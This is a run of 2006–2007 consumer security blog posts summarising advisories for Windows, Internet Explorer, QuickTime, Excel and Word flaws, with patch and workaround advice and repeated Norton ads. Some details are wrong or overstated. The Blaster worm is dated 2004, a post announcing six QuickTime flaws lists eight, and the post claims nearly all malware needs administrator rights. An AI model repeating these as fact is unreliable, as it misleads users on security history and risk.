If you have automatic Windows Updates turned on you will receive the patch when it is pushed to your geographical/IP location. If you prefer to use manual updates (e.g. dial-up customers), start checking whenever you go online, today. All versions of Windows have a link to Windows Updates, somewhere on the Start Menu and also on every version of Internet Explorer (Tools > Windows Update).

If you are unable to obtain Windows Updates at this time you can temporarily protect your Windows computers by downloading and installing a third party patch from eEye Digital Security. If you do install the official Microsoft patch later, be sure you uninstall the eEye patch.

Continue reading "Critical Vulnerability in Windows Animated Cursors - Patch Today" »

Posted by Wiz at 12:27 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Secunia is reporting six new critical vulnerabilites discovered recently in Apple QuickTime plug-ins for Windows and Mac computers, which can be exploited by malicious persons or websites to take over a computer.

Secunia Advisory: SA24359
Release Date: 2007-03-06
Last Update: 2007-03-08
Software: Apple QuickTime 7.x

These vulnerabilities are rated a highly critical and can lead to remote system access and take-over if exploited on an unpatched version of QuickTime, on a Windows or Mac computer. Note that just one of these six vulnerabilities does not affect Mac OS X.

Details:
1) An integer overflow error exists in the handling of 3GP video files, on computers running Windows Vista/XP/2000. NOTE: This does not affect QuickTime on Mac OS X.
Impact: Viewing a maliciously-crafted 3GP file may lead to an application crash or arbitrary code execution

The rest of the vulnerabilities affect computers running Mac OS X v10.3.9 and later or Windows Vista/XP/2000.

2) A boundary error in the handling of MIDI files can be exploited to cause a heap-based buffer overflow.

3) A boundary error in the handling of QuickTime movie files can be exploited to cause a heap-based buffer overflow.

4) An integer overflow exists in the processing of UDTA atom size values in movie files, which can be exploited to corrupt heap memory.

5) A boundary error in the handling of PICT files can be exploited to cause a heap-based buffer overflow.

6) A boundary error in the handling of QTIF files can be exploited to cause a stack-based buffer overflow.

7) An integer overflow exists in the handling of QTIF files.

8) An input validation error exists in the processing of QTIF files. This can be exploited to cause a heap corruption via a specially crafted QTIF file with the "Color Table ID" field set to "0".

Successful exploitation of the vulnerabilities may allow execution of arbitrary code.

Secunia has constructed the Secunia Software Inspector, which you can use to check if your system is vulnerable: http://secunia.com/software_inspector/

Solution:
Apple has issued a patched version of QuickTime. Update to version 7.1.5.

Windows QuickTime Update:
http://www.apple.com/quicktime/download/win.html

Mac OS X QuickTime Update:
http://www.apple.com/quicktime/download/mac.html

Source: http://secunia.com/advisories/24359/

Continue reading "6 New Vulnerabilities found in Apple QuickTime plug-in" »

Posted by Wiz at 2:43 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

On January 1, 2007, Apple Inc. received a documented report about a highly critical vulnerability in it's QuickTime Player software. Since QuickTime is a component of Apple iTunes, iTunes installations are also affected by this vulnerability. There is publicly available proof-of-concept code that exploits this vulnerability. More information about the vulnerability can be found here.

On January 23, 2007 Apple Inc. issued a patched update to it's QuickTime Player, here, on the Apple website. However, that downloadable update is only for Mac operating systems. Windows users are instructed to use the Apple Software Update Tool to download the appropriate patched version for Windows, which was supposed to have been installed when they installed QuickTime, or iTunes onto their computers. Unfortunately, this is a selectable option that may not have been selected by all users.

The instructions for Windows users who did not choose to install that software update tool is to uninstall QuickTime and download the latest version, then run the update tool to see if they have obtained the latest version. If the version you downloaded is vulnerable you would be at tremendous risk by using it online, so download it, then immediately check for updates. Another thing to know is that the software updater itself had to be updated in January, 2007, so if you already had it installed you had better check to see if it needs to be updated, before trying to download the patched version of QuickTime. If that sounds confusing, remember that Apple computers and products are touted as being simpler to use than PC's and their software.

Another thing, if you obtained the QuickTime Player with iTunes software, you may need to update it as well.

Continue reading "Quicktime vulnerability patch problem for Windows users" »

Posted by Wiz at 5:31 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Security researchers have identified a pop-up address bar spoofing weakness in Microsoft's newly released Internet Explorer 7 browser. The flaw, first reported by security notification firm Secunia, might
lend itself to phishing attacks and remains currently unpatched.

The details about this flaw are found here.

The security bug creates a means for hackers to display a popup with partially spoofed address bar where a number of special characters have been appended to a URL. Only part of the address bar will be
displayed, creating a possible mechanism to trick users into believing they are visiting a trusted site rather than one controlled by hackers.

The weakness has been confirmed to exist in IE7, running even on a fully patched Windows XP SP2 system. A number of possible workarounds have been suggested, pending a fix from Microsoft. Secunia advises surfers not to follow links from untrusted sources. The SANS Institute's Internet Storm Centre suggests a more sophisticated fix involving configuring IE7 to open a new Windows in a new tab.

"This vulnerability has a lot of potential for phishers or others that attempt to trick the user into trusting the popup window as they trust the site displayed in the main window," The Internet Storm Centre notes.

Last week, Secunia and Microsoft got into a dispute about whether a separate information disclosure vulnerability affected IE7 or Outlook Express.

Secunia has created a test page, so that IE7 users can check their browsers for this vulnerability.

Secunia Advisory: SA22542
Release Date: 2006-10-25
Last Update: 2006-10-27
Critical: Less critical
Impact: Spoofing
Where: From remote
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x

Posted by Wiz at 11:57 AM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Microsoft Security Advisory 925568:

Vulnerability in Vector Markup Language Could Allow Remote Code Execution

Published: September 19, 2006 | Updated: September 23, 2006

Microsoft has confirmed new public reports of a vulnerability in the Microsoft Windows implementation of Vector Markup Language (VML) Microsoft is also aware of the public release of detailed exploit code that could be used to exploit this vulnerability. Based on our investigation, this exploit code could allow an attacker to execute arbitrary code on the user's system. Microsoft is aware that this vulnerability is being actively exploited.

A security update to address this vulnerability is now being finalized through testing to ensure quality and application compatibility Microsoft�s goal is to release the update on Tuesday, October 10, 2006, or sooner depending on customer needs.

� In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to persuade users to visit the Web site, typically by getting them to click a link in an e-mail message or instant messenger message that takes users to the attacker's Web site.
� An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
� In an e-mail based attack of this exploit, customers who read e-mail in plain text are at less risk from this vulnerability. Instead users would have to either click on a link that would take them to a malicious Web site or open an attachment to be at risk from this vulnerability.
� By default, Internet Explorer on Windows Server 2003 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability because Binary and Script Behaviors are disabled by default in the Internet zone.

One workaround:

Microsoft has tested the following workaround. While this workaround will not correct the underlying vulnerability, it helps block known attack vectors. When a workaround reduces functionality, it is identified in the following section.

Note The following steps require Administrative privileges. It is recommended that the system be restarted after applying this workaround. It is also possible to log out and log back in after applying the workaround however; the recommendation is to restart the system.

To un-register Vgx.dll, follow these steps:

� Click Start, click Run, type

regsvr32 -u "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll"

and then click OK.

� A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.

Impact of Workaround: Applications that render VML will no longer do so once Vgx.dll has been unregistered.

To undo this change, re-register Vgx.dll by following the above steps. Replace the text in Step 1 with

regsvr32 "%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll"

Full Microsoft advisory is here.

Continue reading " Microsoft advisory published on VML zero day exploit" »

Posted by Wiz at 2:27 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Computer code that could be used to hijack Windows PCs via a yet-to-be-patched Internet Explorer flaw has been posted on the Net, experts have warned.

"Microsoft's initial investigation reveals that this exploit code could allow an attacker to execute memory corruption," the representative said. As a workaround to protect against potential attacks, Microsoft suggests Windows users disable ActiveX and active scripting controls.

The flaw is due to an error in an ActiveX control related to multimedia features and could be exploited by viewing a rigged Web page, Symantec said in an alert sent to users of its DeepSight security intelligence service Thursday. An attacker could commandeer a Windows PC or cause IE to crash, the security company said.

IE versions 5.01 and 6 on all current versions of Windows are affected, the French Security Incident Response Team, or FrSIRT, a security-monitoring company, said in an alert Wednesday. FrSIRT deems the issue "critical," its most serious rating.

Miscreants are using an unpatched security bug in Internet Explorer to install malicious software from rigged Web sites, experts warned Tuesday.

The vulnerability lies in the way IE 6 handles certain graphics. Malicious software can be loaded, unbeknownst to the user, onto a vulnerable Windows PC when the user clicks on a malicious link on a Web site or an e-mail message, several security companies said.

"Fully patched Internet Explorer browsers are vulnerable," Ken Dunham, director of the rapid response team at VeriSign's iDefense, said in an e-mailed statement. "This new zero-day attack is trivial to reproduce and has great potential for widespread Web-based attacks in the near future."

Security-monitoring companies Secunia and the French Security Incident Response Team have given the issue their most serious ratings.

Shady adult Web sites are among the first to exploit the IE vulnerability, Eric Sites, vice president of research and development at spyware specialist Sunbelt Software, wrote on a corporate blog. In one case, a malicious Web site used the exploit to install "epic loads of adware," according to Sunbelt.

Microsoft plans to fix the flaw as part of its monthly patching cycle on Oct. 10, the software giant said in a security advisory. The update might be released sooner, "depending on customer needs," Microsoft said. Typically, Microsoft only breaks its patch cycle when attacks are widespread.
========================================

If there was ever a good time to switch to browsing with the Firefox browser, it is now. Also read my posts about running with limited user privileges to protect your computer against all these threats.

Posted by Wiz at 11:10 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Microsoft's security response unit is bracing for the worst after exploit code that offers a blueprint for attacks began circulating on the Internet.

On August 8, 2006, Microsoft released a dozen patches and fixes for Windows and Office products. One of those patches, MS06-040, fixes a vulnerability in the Windows Server Service, as follows:

Buffer Overrun in Server Service Vulnerability:

There is a remote code execution vulnerability in Server Service that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.

That service is normally found and running on computers running Windows 2000, XP Home and Pro (32 and 64 bit), and Server 2003. If you don't apply the patch either via Windows Updates or by downloading from the aforementioned MS page, and you are not behind a firewall that blocks incoming unsolicited TCP traffic, your computer(s) will be at severe risk of being taken over by hackers or criminals, who will use them for their own nefarious purposes.

This vulnerability and the anticipated attacks to come any day now are similar to the infamous MSBlaster Worm attack of August 11, 2004. People who ignored the advise to apply Windows Updates in July 2004 and were not behind good firewalls had their computers invaded by the MSBlast Worm and many found them rebooting within 60 seconds after entering the Windows desktop (due to a RPC Buffer Overflow condition). The Blaster Worm spread from computer to computer over TCP, the protocol which computers use to communicate over the Internet. This new Server Service vulnerability is also attacked via TCP traffic directed to incoming TCP Ports 139 and 445.

If you haven't already received automatic Windows Updates go the the Windows Update website, using Internet Explorer, and download/install the available updates. If you are unable to obtain Windows Updates because your copy of Windows is pirated, or not legally licensed, at least get yourself behind a firewall as soon as possible. Windows XP has one built in that will stop incoming attacks. ZoneLabs ZoneAlarm is an excellent firewall, available in free and paid versions, and Sunbelt makes the free and paid Sunbelt-Kerio Personal Firewall.

I personally prefer the ZoneAlarm Firewall. Zone Labs offers a complete range of firewall products, from the free ZoneAlarm, to the comprehensive protection of ZoneAlarm Plus, to the ultimate privacy and security tools in ZoneAlarm Pro. Use this link to help you to choose which version of ZoneAlarm is best for you.

If you are on a LAN behind a hardware router/firewall you are protected against unsolicited incoming TCP attacks, but not outgoing, phone-home threats that might sneak onto your computer. Do yourself a favor and get a sotware firewall installed onto all of your computers, whether or not they are behind a router. Routers have vulnerabilites also, some of which are being actively exploited right now. Without a software firewall you may be completely at the mercy of criminal attackers who want to add your computers to their BotNets. They will then use your computer to launch DDoS attacks or for use as spam relays.

I have created a webpage all about firewalls and TCP attacks, at: http://www.wizcrafts.net/ans/firewalls.html which is a child of my FAQs page.

Windows Live OneCare

Microsoft offers Windows Live OneCare, an automatically self-updating PC care service that runs quietly in the background. It helps provide persistent protection against viruses, hackers, and other threats, and helps keep your PC tuned up and your important documents backed up. For more details, see Windows Live OneCare at www.windowsonecare.com.

Details about activating the Windows XP firewall are in my extended comments --->

Continue reading "Vulnerability in Microsoft Windows Exposes XP/2000 Computers to Worm Attacks - Again" »

Posted by Wiz at 2:12 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Source: http://www.pcworld.com/resource/article/0,aid,126307,pg,1,RSS,RSS,00.asp

W32.Cuebot-K spreads via through AIM and disguises itself as Windows
Genuine Advantage on infected PCs.

Security analysts have detected a new piece of malware that appears to run
as a Microsoft program used to detect unlicensed versions of its operating
system.

The malware has been classified as a worm and spreads through AOL's
Instant Messenger program, said Graham Cluley, senior technology
consultant for Sophos PLC, a security vendor.

Continue reading "Worm Masquerades as Microsoft Antipiracy Program" »

Posted by Wiz at 12:56 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Here are two reports about unpatched Excel flaws from Secunia.

1: Microsoft Excel Repair Mode Code Execution Vulnerability
http://secunia.com/advisories/20686/

Secunia Advisory: SA20686
Advisory Release Date: 2006-06-16
Last Update: 2006-06-20

Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Vendor Workaround

Software:
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003
Microsoft Excel Viewer 2003
Microsoft Office 2000
Microsoft Office 2003 Professional Edition
Microsoft Office 2003 Small Business Edition
Microsoft Office 2003 Standard Edition
Microsoft Office 2003 Student and Teacher Edition
Microsoft Office 2004 for Mac
Microsoft Office X for Mac
Microsoft Office XP

CVE reference: CVE-2006-3059

Description:
A vulnerability has been discovered in Microsoft Excel, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a memory corruption error in the "repair mode" functionality used for repairing corrupted documents. This can be exploited via a specially crafted Excel documents.

Successful exploitation allows execution of arbitrary code.

The vulnerability has been confirmed on a fully updated Windows XP SP2 system with Microsoft Excel 2003 SP2. Other versions may also be affected.

NOTE: This vulnerability is a so-called 0-day and is already being actively exploited.

Solution:
Don't open untrusted Excel documents.

The vendor has published various workarounds (see vendor advisory).

Provided and/or discovered by:
Discovered in the wild.

Changelog:
2006-06-20: Added additional information from Microsoft. Added CVE reference. Updated "Solution" section by referring to vendor workarounds.

Original Advisory:
Microsoft: http://www.microsoft.com/technet/security/advisory/921365.mspx http://blogs.technet.com/msrc/archive/2006/06/16/436174.aspx

Secunia Advisory: SA20748
Advisory Release Date: 2006-06-20
Last Update: 2006-06-22

Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

OS:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

CVE reference: CVE-2006-3086

Description:
kcope has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in hlink.dll within the handling of Hyperlinks in e.g. Excel documents. This can be exploited to cause a stack-based buffer overflow by tricking a user into clicking a specially crafted Hyperlink in a malicious Excel document.

Successful exploitation allows execution of arbitrary code.

The vulnerability has been confirmed on a fully patched Windows XP SP2 system running Microsoft Excel 2003 SP2. Other versions and products using the vulnerable library may also be affected.

Solution:
Do not open untrusted Microsoft Office documents.

Do not follow links in Microsoft Office documents.

Provided and/or discovered by: kcope

Changelog:
2006-06-22: Added CVE reference. Added link to US-CERT vulnerability note. Added various Windows versions as vulnerable instead of Office products.

Original Advisory:
Microsoft: http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx

Other References:
US-CERT VU#394444: http://www.kb.cert.org/vuls/id/394444

Microsoft has offered some workarounds, which I have listed on this blog page.

Also, see this Microsoft Advisory for the latest information and workarounds.

Posted by Wiz at 12:58 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Microsoft Security Advisory (921365)
- Title: Vulnerability in Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/921365.mspx
- Revision Note: Advisory Published: June 19, 2006

Microsoft is investigating new public reports of limited �zero-day� attacks using a vulnerability in Microsoft Excel 2003, Excel Viewer 2003, Excel 2002, Excel 2000, Microsoft Excel 2004 for Mac, and Microsoft Excel v. X for Mac. In order for this attack to be carried out, a user must first open a malicious Excel file attached to an e-mail or otherwise provided to them by an attacker.

Opening the Excel document out of email will prompt the user to be careful about opening the attachment.

As a best practice, users should always exercise extreme caution when opening unsolicited attachments from both known and unknown sources. Microsoft has added detection to the Windows Live Safety Center today for up-to-date removal of malicious software that attempts to exploit this vulnerability.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

All Windows users should apply the latest Microsoft security updates to help make sure that their computers are as protected as possible. If you are not sure whether your software is up to date, visit the Windows Update Web site, scan your computer for available updates, and install any high-priority updates that are offered to you. If you have Automatic Updates enabled, the updates are delivered to you when they are released, but you have to make sure you install them.

Workarounds listed in extended comments >>>

Continue reading "Workarounds for Excel 'Zero-Day' Flaw" »

Posted by Wiz at 9:50 AM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

May 22, 2006: Malware writers have created a new worm that installs a new browser and plays screeching music.

The trouble starts with a link apparently sent by a friend in Yahoo's instant messaging program.

Instant messaging security company FaceTime Communications Inc. described the malware, which it called yhoo32.explr, as "insidious" in a security advisory Friday.

When the link is clicked, a worm installs the so-called Safety Browser, a program that leads the user to pages mined with adware and viruses, FaceTime said. The Safety Browser uses an Internet Explorer logo to make it look more legitimate.

Malware spread through instant messaging programs is on the rise. However, FaceTime said this malware appeared to be the first to install a browser without the user's permission.

The bug also hijacks Internet Explorer's home page, directing users to the Safety Browser's Web site.

After it is launched, the worm sends itself to others on the user's instant messaging contact list.

The malware is engineered to overwrite instant messages typed by a user, FaceTime said. The infected message can also be changed on the fly, it noted.

The screeching music, however, is blocked by Microsoft Corp.'s Windows XP Service Pack 2, FaceTime said.

Posted by Wiz at 3:46 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

May 19, 2006
Antivirus companies and the SANS Internet Storm Center (ISC) issued a warning today about sophisticated e-mail attacks that are using a previously unknown hole in Microsoft Word 2003 to infiltrate corporate networks. Symantec raised its Internet threat rating, citing confirmation that attacks using an unknown hole in Microsoft Word are being used to compromise computers on the Internet.

Symantec warned subscribers to its DeepSight Threat Management Service that it had confirmed reports of active exploitation of a hole in Microsoft Word 2003. The attacks use Word document attachments in e-mail messages to trigger the security hole and run code that gives attackers control over vulnerable systems, Symantec said.

Currently, these attacks are coming from China and Taiwan and most are in Chinese but some are showing up in English. All are being targeted at corporate networks at this time, but that may change in the near future. Corporations typically transfer Word documents between departments and divisions, so their employees are not averse to opening .doc attachments.

Microsoft Word and other Office applications are a good target, because they are seen everywhere on corporate computers, and because companies often patch them far less frequently than the Windows operating system itself. It is for this reason the Microsoft introduced Microsoft Update Service (MUS). When you login to the Windows Updates on a Windows 2000 or XP machine you will see a link to try Microsoft Updates. I recommend that if you have Office products on that computer you should install ("Try It") the Microsoft Update Service. It will audit your computer for all Microsoft products that are installed and will make patches available as critical patches, just like it does with Windows Updates.

A word of warning, if your copy of Office is unlicensed or pirated they will eventually find out and deny any further downloads until you obtain a vaild license.

NOTE: In order to exploit this flaw in MS Word the user must be logged on with Administrator level privileges. People who log on and operate as Limited Users are immune to this vulnerability. This applies to spyware and virus acquisions as well. Virtually every known type of malware requires Administrator privileges to infect a PC. By simply running your daily browsing and email activities as a Limited User you mitigate the possibility that you will unknowingly acquire a malware infection from being online.

Caution still must be exercised because it is possible for downloaded viruses and malware to become active if you logon to an administrative account and inadvertantly allow them, or be tricked into allowing them to be installed.

Continue reading "E-mail attacks target unpatched Word hole" »

Posted by Wiz at 1:47 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

The new version of Quicktime, v. 7.1, is available for both Microsoft Windows and Mac systems, and is downloadable here. Apple said the older versions contain security holes that attackers could use to break into both Windows and Mac machines running the software.

On May 11 Apple Computers released a patched version of it's Quicktime media player, fixing vulnerabilities affecting both the Mac and Windows versions of the player. A total of 43 serious flaws were patched with the release of Quicktime 7.1 (read about them in the extended comments). The company's Security Update 2006-003 patches 31 flaws in the Mac OS X, most of them serious enough to cause "arbitrary code execution attacks." Quicktime security release 7.1 also corrects 12 code execution and denial-of-service flaws.

The QuickTime bugs can allow a malicious hacker to launch successful attacks using different vectors; a specially crafted JPEG image; rigged QuickTime movies; specially created Flash, MPEG4 or H.264 movies; or maliciously crafted FlashPiX or BMP images.

The Mac OS X update also fixes code execution vulnerabilities in AppKit, ImageIO, BOM, CFNetwork, ClamAV, CoreFoundation, Finder, FTPServer, FlashPlayer, LaunchServices, libcurl, Preview, QuickDraw and QuickTime Streaming Server.

If you are looking for the Standalone version of QuickTime that does not include Apple iTunes you can download the newest version (with this latest security patch included) from this Apple link.

Continue reading "Serious New Flaws in Apple Quicktime | 7.1 Patch Details" »

Posted by Wiz at 10:19 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.